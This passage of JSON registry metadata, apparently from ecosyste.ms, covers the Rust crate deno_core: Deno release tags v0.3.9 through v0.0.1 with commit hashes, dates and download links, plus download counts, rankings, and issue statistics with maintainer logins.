osts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-31T09:36:56.178Z","dependent_packages_count":116,"downloads":7189545,"downloads_period":"total","dependent_repos_count":396,"rankings":{"downloads":2.4730015172701036,"dependent_repos_count":2.086246392764704,"dependent_packages_count":0.5392258947431053,"stargazers_count":12.09799779847083,"forks_count":9.989577129243598,"docker_downloads_count":3.236226684728404,"average":5.070379236203458},"purl":"pkg:cargo/deno_core","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_core","docker_dependents_count":30,"docker_downloads_count":23282372,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_core","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_core/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-31T04:05:42.345Z","issues_count":6636,"pull_requests_count":9651,"avg_time_to_close_issue":17191240.372105263,"avg_time_to_close_pull_request":1531932.6714801444,"issues_closed_count":3798,"pull_requests_closed_count":8032,"pull_request_authors_count":583,"issue_authors_count":2480,"avg_comments_per_issue":2.5051235684147075,"avg_comments_per_pull_request":0.7197181639208372,"merged_pull_requests_count":7013,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":671,"past_year_pull_requests_count":1202,"past_year_avg_time_to_close_issue":1410952.7079646017,"past_year_avg_time_to_close_pull_request":1322346.2602118002,"past_year_issues_closed_count":226,"past_year_pull_requests_closed_count":661,"past_year_pull_request_authors_count":186,"past_year_issue_authors_count":373,"past_year_avg_comments_per_issue":1.232488822652757,"past_year_avg_comments_per_pull_request":1.1123128119800334,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":13,"past_year_merged_pull_requests_count":488,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1799,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":284,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":395,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_core/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_core/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_core/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_core/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.i